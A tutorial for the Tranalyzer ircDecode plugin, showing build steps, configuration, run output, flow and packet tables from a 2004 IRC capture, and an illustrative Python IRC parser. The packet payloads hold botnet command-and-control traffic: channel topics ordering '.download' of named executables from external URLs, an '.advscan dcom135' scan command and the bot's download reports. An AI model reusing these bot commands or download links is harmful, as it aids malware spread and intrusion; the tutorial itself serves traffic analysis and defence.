IRC: Internet Relay Chat


Introduction

This tutorial discusses the plugin ircDecode.

Preparation

First, restore T2 into a pristine state by removing all unnecessary or older plugins from the plugin folder ~/.tranalyzer/plugins:

t2build -e -y

Are you sure you want to empty the plugin folder '/home/wurst/.tranalyzer/plugins' (y/N)? yes
Plugin folder emptied

Then compile the core (tranalyzer2) and the following plugins:

t2build tranalyzer2 basicFlow tcpStates ircDecode txtSink

...
BUILD SUCCESSFUL

If you have not yet created separate data and results directories, do it now in another bash window; keeping input and output apart simplifies the workflow:

mkdir ~/data ~/results

The sample PCAP used in this tutorial can be downloaded here: irc-channel.pcap.

Please save it in your ~/data folder.

Now you are all set for analyzing IRC traffic!

ircDecode

Let’s look at the plugin configuration first:


vi src/ircDecode.h

...
/* ========================================================================== */
/* ------------------------ USER CONFIGURATION FLAGS ------------------------ */
/* ========================================================================== */

#define IRC_SAVE       0 // save content to IRC_F_PATH

#define IRC_CMD_AGGR   1 // Aggregate IRC commands/response codes
#define IRC_BITFIELD   0 // Bitfield coding of IRC commands

#define IRC_UXNMLN    10 // maximal username length
#define IRC_PXNMLN    10 // maximal password length
#define IRC_NXNMLN    10 // maximal nickname length
#define IRC_MXNMLN    50 // maximal name length

#define IRC_MAXUNM     5 // Maximal number of users
#define IRC_MAXPNM     5 // Maximal number of passwords
#define IRC_MAXNNM     5 // Maximal number of nicknames
#define IRC_MAXCNM    20 // Maximal number of parameters

/* +++++++++++++++++++++ ENV / RUNTIME - conf Variables +++++++++++++++++++++ */

#define IRC_RMDIR                 1 // empty IRC_F_PATH before starting (requires IRC_SAVE=1)
#define IRC_F_PATH "/tmp/IRCFILES/" // Path for extracted content

/* ========================================================================== */
/* ------------------------- DO NOT EDIT BELOW HERE ------------------------- */
/* ========================================================================== */
...

Run t2 on the supplied pcap.

t2 -s -r ~/data/irc-channel.pcap -w ~/results

================================================================================
Tranalyzer 0.9.1 (Anteater), Cobra. PID: 40284, Prio: 0, SID: 666
================================================================================
[INF] Creating flows for L2, IPv4, IPv6
Active plugins:
    01: basicFlow, 0.9.1
    02: tcpStates, 0.9.1
    03: ircDecode, 0.9.1
    04: txtSink, 0.9.1
[INF] IPv4 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 481438 (481.44 K)
[INF] IPv6 Ver: 5, Rev: 09082023, Range Mode: 0, subnet ranges loaded: 41486 (41.49 K)
Processing file: /home/user/data/irc-channel.pcap
Link layer type: Ethernet [EN10MB/1]
Snapshot length: 65535 (65.53 K)
Dump start: 1103769025.701839000 sec (Thu 23 Dec 2004 02:30:25 GMT)
Dump stop : 1103769038.791977000 sec (Thu 23 Dec 2004 02:30:38 GMT)
Total dump duration: 13.090138000 sec
Finished processing. Elapsed time: 0.000487842 sec
Finished unloading flow memory. Time: 0.000518763 sec
Percentage completed: 100.00%
Number of processed packets: 48
Number of processed bytes: 8429 (8.43 K)
Number of raw bytes: 8429 (8.43 K)
Number of pad bytes: 54
Number of pcap bytes: 9221 (9.22 K)
Number of IPv4 packets: 48 [100.00%]
Number of A packets: 24 [50.00%]
Number of B packets: 24 [50.00%]
Number of A bytes: 2446 (2.45 K) [29.02%]
Number of B bytes: 5983 (5.98 K) [70.98%]
<A packet load>: 101.92
<B packet load>: 249.29
--------------------------------------------------------------------------------
tcpStates: Aggregated tcpStatesAFlags=0x02
ircDecode: Aggregated ircStat=0x03
ircDecode: Number of IRC packets: 48 [100.00%]
--------------------------------------------------------------------------------
Headers count: min: 3, max: 3, avg: 3.00
Number of TCP packets: 48 [100.00%]
Number of TCP bytes: 8429 (8.43 K) [100.00%]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Number of processed      flows: 2
Number of processed IPv4 flows: 2 [100.00%]
Number of processed A    flows: 1 [50.00%]
Number of processed B    flows: 1 [50.00%]
Number of request        flows: 1 [50.00%]
Number of reply          flows: 1 [50.00%]
Total   A/B    flow asymmetry: 0.00
Total req/rply flow asymmetry: 0.00
Number of processed A+B packets/A+B flows: 24.00
Number of processed A   packets/A   flows: 24.00
Number of processed   B packets/  B flows: 24.00
Number of processed total packets/s: 3.67
Number of processed A+B   packets/s: 3.67
Number of processed A     packets/s: 1.83
Number of processed   B   packets/s: 1.83
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<Number of processed flows/s>: 0.15
<Bandwidth>: 5118 b/s (5.12 Kb/s)
<Raw bandwidth>: 5151 b/s (5.15 Kb/s)
Max number of flows in memory: 2 [0.00%]
Memory usage: 0.03 GB [0.05%]
Aggregated flowStat=0x0400000000004000
[INF] IPv4 flows

The aggregated ircStat=0x03 in the end report tells us that IRC traffic was found. The -V option of tawk decodes the bitfield:

tawk -V ircStat=0x03

The ircStat column with value 0x03 is to be interpreted as follows:

   bit | ircStat | Description
   =============================================================================
     0 | 0x01    | IRC port found
     1 | 0x02    | IRC registration successful

tcol ~/results/irc-channel_flows.txt

%dir  flowInd  flowStat            timeFirst             timeLast              duration      numHdrDesc  numHdrs  hdrDesc       srcMac             dstMac             ethType  vlanID  srcIP         srcIPCC  srcIPOrg           srcPort  dstIP         dstIPCC  dstIPOrg           dstPort  l4Proto  tcpStatesAFlags  ircStat  ircCC                                      ircRC                                                             ircNumUser  ircUser       ircNumPass  ircPass   ircNumNick  ircNick       ircNumC  ircC
A     1        0x0400000000004000  1103769025.701839000  1103769038.791977000  13.090138000  1           3        eth:ipv4:tcp  00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800           172.16.1.10   05       "Private network"  1049     69.64.34.124  us       "GoDaddycom"       6667     6        0x02             0x01     PASS;NICK;USER;USERHOST;MODE;JOIN;PRIVMSG                                                                    1           "ghmfeirsfn"  1           "l0m3za"  1           "damn-02629"  0
B     1        0x0400000000004001  1103769025.790150000  1103769038.679021000  12.888871000  1           3        eth:ipv4:tcp  00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800           69.64.34.124  us       "GoDaddycom"       6667     172.16.1.10   05       "Private network"  1049     6        0x02             0x03                                                1;2;3;4;5;251;252;253;254;255;265;23;422;332;333;353;366;302;404  0                         0                     0                         0

tcol irc-channel_packets.txt

%pktNo  flowInd  flowStat            time                  pktIAT       pktTrip      flowDuration  numHdrs  hdrDesc       vlanID  srcMac             dstMac             ethType  srcIP         srcIPCC  srcIPOrg         srcPort  dstIP         dstIPCC  dstIPOrg         dstPort  l4Proto  tcpStatesAFlags  l7Content
1       1        0x0400000000004000  1103769025.701839000  0.000000000  0.000000000  0.000000000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00
2       1        0x0400000000004001  1103769025.790150000  0.000000000  0.088311040  0.000000000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00
3       1        0x0400000000004000  1103769025.790194000  0.088355000  0.000043968  0.088355000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00
4       1        0x0400000000004000  1103769025.790393000  0.000199000  0.000243008  0.088554000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00             PASS l0m3za\r\n
5       1        0x0400000000004001  1103769025.884012000  0.093862000  0.093619008  0.093862000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00
6       1        0x0400000000004000  1103769025.884064000  0.093671000  0.000051968  0.182225000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00             NICK damn-0262937047\r\nUSER ghmfeirsfnw 0 0 :damn-0262937047\r\n
7       1        0x0400000000004001  1103769025.917981000  0.033969000  0.033916992  0.127831000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00             :hunt3d.devilz.net NOTICE AUTH :*** Looking up your hostname...\r\n
8       1        0x0400000000004001  1103769026.007891000  0.089910000  0.123827008  0.217741000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00
9       1        0x0400000000004000  1103769026.051260000  0.167196000  0.043369000  0.349421000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00
10      1        0x0400000000004001  1103769026.065997000  0.058106000  0.014737000  0.275847000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00             :hunt3d.devilz.net NOTICE AUTH :*** Found your hostname\r\n:hunt3d.devilz.net 001 damn-0262937047 :Welcome to the devilz IRC Network damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net\r\n:hunt3d.devilz.net 002 damn-0262937047 :Your host is hunt3d.devilz.net, running version Unreal3.2\r\n:hunt3d.devilz.net 003 damn-0262937047 :This server was created Thu Sep 9 2004 at 14:58:49 CDT\r\n:hunt3d.devilz.net 004 damn-0262937047 hunt3d.devilz.net Unreal3.2 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT\r\n:hunt3d.devilz.net 005 damn-0262937047 MAP KNOCK SAFELIST HCN MAXCHANNELS=10 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server\r\n:hunt3d.devilz.net 005 damn-0262937047 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beqa,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=devilz CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server\r\n:hunt3d.devilz.net 251 damn-0262937047 :There are 1 users and 5122 invisible on 1 servers\r\n:hunt3d.devilz.net 252 damn-0262937047 2 :operator(s) online\r\n:hunt3d.devilz.net 253 damn-0262937047 14 :unknown connection(s)\r\n:hunt3d.devilz.net 254 damn-0262937047 19 :channels formed\r\n:hunt3d.devilz.net 255 damn-0262937047 :I have 5123 clients and 0 servers\r\n:hunt3d.devilz.net 265 damn-0262937047 :Current Local Users: 5123  Max: 9508\r\n:hunt3d.devilz.net 266 damn-0262937047 :Current Global Users: 51
11      1        0x0400000000004001  1103769026.151945000  0.085948000  0.100684992  0.361795000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00             23  Max: 5123\r\n:hunt3d.devilz.net 422 damn-0262937047 :MOTD File is missing\r\n:damn-0262937047 MODE damn-0262937047 :+i\r\n:damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net JOIN :#s01\r\n:hunt3d.devilz.net 332 damn-0262937047 #s01 :.download http://www.wanees.net/bbnz.exe bbnz.exe 1\r\n:hunt3d.devilz.net 333 damn-0262937047 #s01 AL7uB 1103771901\r\n:hunt3d.devilz.net 353 damn-0262937047 @ #s01 :damn-0262937047 \r\n:hunt3d.devilz.net 366 damn-0262937047 #s01 :End of /NAMES list.\r\n:damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net JOIN :#s02\r\n:hunt3d.devilz.net 332 damn-0262937047 #s02 :.download http://webacceptor.findwhatevernow.com:8091/get.file?action=file&afp=13001&class=682&affiliate=jocker jocker.exe 1\r\n:hunt3d.devilz.net 333 damn-0262937047 #s02 AL7uB 1103771882\r\n:hunt3d.devilz.net 353 damn-0262937047 @ #s02 :damn-0262937047 \r\n:hunt3d.devilz.net 366 damn-0262937047 #s02 :End of /NAMES list.\r\n:damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net JOIN :#s03\r\n:hunt3d.devilz.net 332 damn-0262937047 #s03 :.download http://ysbweb.com/ist/scripts/ysb_exe.php?account_id=1000489&user_level=3 ysbinstall_1000489_3.exe 1\r\n:hunt3d.devilz.net 333 damn-0262937047 #s03 AL7uB 1103771894\r\n:hunt3d.devilz.net 353 damn-0262937047 @ #s03 :damn-0262937047 \r\n:hunt3d.devilz.net 366 damn-0262937047 #s03 :End of /NAMES list.\r\n
12      1        0x0400000000004000  1103769026.152009000  0.100749000  0.000064000  0.450170000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00
13      1        0x0400000000004000  1103769026.152172000  0.000163000  0.000227008  0.450333000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00             USERHOST damn-0262937047\r\n
14      1        0x0400000000004001  1103769026.289572000  0.137627000  0.137400000  0.499422000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00
15      1        0x0400000000004000  1103769026.289639000  0.137467000  0.000067008  0.587800000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00             MODE damn-0262937047 -x+i\r\nJOIN #sl0w3r l03dx\r\nUSERHOST damn-0262937047\r\nMODE damn-0262937047 -x+i\r\nJOIN #sl0w3r l03dx\r\nUSERHOST damn-0262937047\r\nMODE damn-0262937047 -x+i\r\nJOIN #sl0w3r l03dx\r\nPRIVMSG #s01 :[DOWNLOAD]: Downloading URL: http://www.wanees.net/bbnz.exe to: bbnz.exe.\r\nPRIVMSG #s02 :[DOWNLOAD]: Downloading URL: http://webacceptor.findwhatevernow.com:8091/get.file?action=file&afp=13001&class=682&affiliate=jocker to: jocker.exe.\r\nPRIVMSG #s03 :[DOWNLOAD]: Downloading URL: http://ysbweb.com/ist/scripts/ysb_exe.php?account_id=1000489&user_level=3 to: ysbinstall_1000489_3.exe.\r\n
16      1        0x0400000000004001  1103769026.307624000  0.018052000  0.017984992  0.517474000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00             :hunt3d.devilz.net 302 damn-0262937047 :damn-0262937047=+ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net    \r\n
17      1        0x0400000000004000  1103769026.452507000  0.162868000  0.144883008  0.750668000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00
18      1        0x0400000000004001  1103769026.489405000  0.181781000  0.036897984  0.699255000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00
19      1        0x0400000000004001  1103769026.545407000  0.056002000  0.092899968  0.755257000   3        eth:ipv4:tcp          00:01:e1:01:20:e8  00:d0:59:aa:af:80  0x0800   69.64.34.124  us       GoDaddycom       6667     172.16.1.10   05       Private network  1049     6        0x00             :damn-0262937047!ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net JOIN :#sl0w3r\r\n:hunt3d.devilz.net 332 damn-0262937047 #sl0w3r :.advscan dcom135 200 3 0 -r -s\r\n:hunt3d.devilz.net 333 damn-0262937047 #sl0w3r gh 1103760898\r\n:hunt3d.devilz.net 353 damn-0262937047 @ #sl0w3r :damn-0262937047 @AL7uB @Under0 \r\n:hunt3d.devilz.net 366 damn-0262937047 #sl0w3r :End of /NAMES list.\r\n:hunt3d.devilz.net 302 damn-0262937047 :damn-0262937047=+ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net    \r\n:hunt3d.devilz.net 302 damn-0262937047 :damn-0262937047=+ghmfeirsfn@h-68-164-92-148.snvacaid.dynamic.covad.net    \r\n
20      1        0x0400000000004000  1103769026.653201000  0.200694000  0.107794048  0.951362000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00
21      1        0x0400000000004000  1103769027.129847000  0.476646000  0.584440032  1.428008000   3        eth:ipv4:tcp          00:d0:59:aa:af:80  00:01:e1:01:20:e8  0x0800   172.16.1.10   05       Private network  1049     69.64.34.124  us       GoDaddycom       6667     6        0x00             PRIVMSG #s03 :[DOWNLOAD]: Downloaded 28.6 KB to ysbinstall_1000489_3.exe @ 28.6 KB/sec.\r\n
...
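The flow columns above (ircStat, ircCC, ircRC, ircUser, ircPass, ircNick) are derived from the CRLF-delimited IRC messages visible in l7Content. The following Python is an added illustration, not the plugin's code: it parses IRC messages as defined in RFC 1459 (optional prefix, command, parameters, trailing parameter after " :"), reassembles each direction of the stream so that a reply cut across two segments (as packets 10 and 11 above) is still parsed whole, and applies the IRC_UXNMLN/IRC_PXNMLN/IRC_NXNMLN limits from the header so that the truncated "ghmfeirsfn" and "damn-02629" values match the flow output. The sample payloads are a constructed, abridged subset of flow 1 above. Assumptions: port 6667 is treated as the IRC port, bit 0x02 is set when the server sends RPL_WELCOME (001), and commands are aggregated by first appearance (IRC_CMD_AGGR=1); unlike the plugin output, this version also records server-relayed commands such as NOTICE in ircCC.

```python
"""Illustrative per-direction IRC flow summary (not the ircDecode plugin's code)."""
from dataclasses import dataclass, field
from typing import List, Optional

# Limits copied from the USER CONFIGURATION FLAGS in ircDecode.h.
IRC_UXNMLN = 10  # maximal username length
IRC_PXNMLN = 10  # maximal password length
IRC_NXNMLN = 10  # maximal nickname length

IRC_PORT = 6667             # assumption: port considered IRC
IRC_STAT_PORT = 0x01        # bit 0: IRC port found
IRC_STAT_REGISTERED = 0x02  # bit 1: registration successful (assumed: RPL_WELCOME 001 seen)


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str]


def parse_irc_message(line: str) -> IrcMessage:
    """Split one CRLF-stripped line per RFC 1459 2.3.1. The trailing parameter
    after the first ' :' may contain spaces and is kept as a single value."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    if not parts:
        raise ValueError("IRC message without a command")
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return IrcMessage(prefix, parts[0].upper(), params)


@dataclass
class IrcFlowSummary:
    ircStat: int = 0
    ircCC: List[str] = field(default_factory=list)  # commands, first occurrence
    ircRC: List[int] = field(default_factory=list)  # numeric replies, first occurrence
    ircUser: List[str] = field(default_factory=list)
    ircPass: List[str] = field(default_factory=list)
    ircNick: List[str] = field(default_factory=list)
    partial: str = ""  # unterminated tail of the stream, not parsed


def _add_unique(lst, value):
    """IRC_CMD_AGGR=1 behaviour: each command or reply code is listed once."""
    if value not in lst:
        lst.append(value)


def summarize_irc_flow(segments: List[str], src_port: int, dst_port: int) -> IrcFlowSummary:
    """Join the TCP payloads of one direction, split on CRLF and summarize.
    A message may span segments, so the stream is reassembled before parsing."""
    s = IrcFlowSummary()
    if IRC_PORT in (src_port, dst_port):
        s.ircStat |= IRC_STAT_PORT
    lines = "".join(segments).split("\r\n")
    s.partial = lines.pop()  # '' when the stream ended on a CRLF
    for line in lines:
        if not line:
            continue
        msg = parse_irc_message(line)
        if msg.command.isdigit():
            code = int(msg.command)
            _add_unique(s.ircRC, code)
            if code == 1:  # RPL_WELCOME: the server accepted NICK/USER
                s.ircStat |= IRC_STAT_REGISTERED
            continue
        _add_unique(s.ircCC, msg.command)
        if msg.command == "PASS" and msg.params:
            _add_unique(s.ircPass, msg.params[0][:IRC_PXNMLN])
        elif msg.command == "NICK" and msg.params:
            _add_unique(s.ircNick, msg.params[0][:IRC_NXNMLN])
        elif msg.command == "USER" and msg.params:
            _add_unique(s.ircUser, msg.params[0][:IRC_UXNMLN])
    return s


# Constructed sample: abridged client (A) and server (B) payloads of flow 1 above.
# The 266 reply is cut mid-message and continued in the next segment, as in packets 10/11.
CLIENT_SEGMENTS = [
    "PASS l0m3za\r\n",
    "NICK damn-0262937047\r\nUSER ghmfeirsfnw 0 0 :damn-0262937047\r\n",
    "USERHOST damn-0262937047\r\n",
    "MODE damn-0262937047 -x+i\r\nJOIN #sl0w3r l03dx\r\nUSERHOST damn-0262937047\r\n",
]
SERVER_SEGMENTS = [
    ":hunt3d.devilz.net NOTICE AUTH :*** Looking up your hostname...\r\n",
    ":hunt3d.devilz.net 001 damn-0262937047 :Welcome to the devilz IRC Network\r\n"
    ":hunt3d.devilz.net 002 damn-0262937047 :Your host is hunt3d.devilz.net, running version Unreal3.2\r\n"
    ":hunt3d.devilz.net 005 damn-0262937047 MAP KNOCK SAFELIST :are supported by this server\r\n"
    ":hunt3d.devilz.net 005 damn-0262937047 WALLCHOPS WATCH=128 :are supported by this server\r\n"
    ":hunt3d.devilz.net 266 damn-0262937047 :Current Global Users: 51",
    "23  Max: 5123\r\n:hunt3d.devilz.net 422 damn-0262937047 :MOTD File is missing\r\n",
]


def summarize_sample():
    """Return the (A, B) summaries for the constructed sample flow."""
    a = summarize_irc_flow(CLIENT_SEGMENTS, src_port=1049, dst_port=6667)
    b = summarize_irc_flow(SERVER_SEGMENTS, src_port=6667, dst_port=1049)
    return a, b


if __name__ == "__main__":
    for d, s in zip("AB", summarize_sample()):
        print(d, hex(s.ircStat), ";".join(s.ircCC), ";".join(map(str, s.ircRC)),
              s.ircUser, s.ircPass, s.ircNick)
```

Running the block prints ircStat=0x1 for the client side and 0x3 for the server side, the same split as in the flow file above; the truncated user and nick values show why the flow output does not contain the full names seen in l7Content.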

Conclusion

Don’t forget to reset the plugin configuration for the next tutorial.

t2conf ircDecode --reset && t2build ircDecode

Have fun analyzing IRC traffic!